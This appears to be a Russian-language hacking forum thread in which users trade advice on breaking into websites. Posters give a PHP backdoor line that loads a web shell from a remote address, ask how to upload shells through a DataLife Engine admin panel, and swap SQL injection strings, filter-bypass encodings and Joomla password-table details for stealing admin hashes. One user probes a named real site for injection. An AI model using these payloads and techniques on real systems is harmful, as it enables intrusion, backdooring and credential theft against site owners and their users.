Ваши вопросы по уязвимостям.

Pavel1987, зачем совать system($_GET["cmd"]); ???
вставляй eval(file_get_contents($_GET['e']))
и потом обращайся www.xz.сom/forumpath/faq.php?cmd=http://адресс_до_шела

почитай ВНИМАТЕЛЬНО тут

 

ахтунг, можно. Через уязвимости ПО, нет, не Веб ПО, а просто ПО, ftp, ssh сплойты и т.п.

 

А блин точно) Спасибо большое)) Я думал шелл надо совать в админку в модули, а не заливать куда-то, во я дурак))))

 

Подскажите как залить шелл через админку DataLife Engine..
Есть доступ на прикрепление файлов к новостям.

 

прочитай несколько постов назад, был такой умник уже.

 

а зачем давать детишкам шелл с графикой? если они не могут самым нормальным шелом воспользоватся, в графике они самое умное что сделают так задефейсят сайт ...был дан код который можно вставить в модули, но вариантов куча, если брать по твоему то зачем и eval(file_get_contents($_GET['e'])) когда можно код всего шелла в модули пропихнуть?...
П.С. Зачем доисторическому человеку давать бензопилу? Ведь он не знает что с топором то делать...

 

SELECT DISTINCT a.ad_id, a.house_ad,a.url,b.filePath FROM advertising a, tddmadmin_file b WHERE a.date_start <= now() AND a.date_end >= now() AND a.status = 'active' AND a.adpage = 'blablabla.php?type=2'+group+by+2+--+' AND a.fileid = b.fileID
[nativecode=1064 ** You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'group+by+2+--+' AND a.fileid = b.fileID' at line 5]

Подскажите как запрос свой всунуть а то с одной ' он выплевывает это, а если 2 поставить то запрос выполняется. Что в таком случае делать нужно...
'+group+by+2+--+ это пишу я ) тут плюсы фильтруются или че?

 

Попробуй вместо + поставить %20

 

имя таблицы от куда вытащил idevaff_admin, пароли хранились sha1

 

в джумле по дефолту имя таблицы jos_users, а алгоритм шифрования md5 или md5($pass.$salt) (зависит от версии джумлы)

выводы делай сам.

 

я понимаю но почему то админка на joomla, пароли были sha1. а таблиц который должны быть в joomle там почему то нет!
ps могу скинут линк в пм сам глянешь, и если не трудно растолкуй потом мне.

 

я новичёк на сайте так что сильно не пинайтею я не знаю куда написать свой вопрос

скажите как удалить локальный диск!?

пишите в личку

 

куда здесь дальше вписывать +order+by+1-- ?
http://phonekz.ru/?region=%5C%22&id=1
http://phonekz.ru/?region=\'&id=1

 

Там нет SQL Инъекции
Попробуй подставь в конец ссылки ковычку '. Ошибки нет.

 

ну а это тогда что означает ?

Code:

Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /home/ftproot/data/www/phonekz.ru/index.php on line 87

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/ftproot/data/www/phonekz.ru/index.php on line 103

 

Какая то ошибка в 87 и 103 строке, точно не знаю что.
Но это точно не иньекция..

 

здесь тоже нет ? http://phonekz.ru:80/?region=\"&id=1&city=2133

 

все равно фильтрует=\ эт значит уязвимости нету?

 

Тут тоже нет.

 

Варианты обхода пробелов:
/**/,+, %0А, %09, %20, %0d ,%2B, /*tuns*/
Если ничто не помогло - крути без пробелов, если ничто сделать не сможешь - готов помочь в асе - 4000840.

Эта ошибка означает, что бд вернула неккоректный результат, чаще всего это инъекции сыпятся с такими ошибками, но это ошибка php, а не mysql. Может быть вывод ошибок mysql просто напросто отключен, но если посыпалась такая ошибка с подставлением ' - то значит в скрипте плохая фильтрация --> может быть инъекция.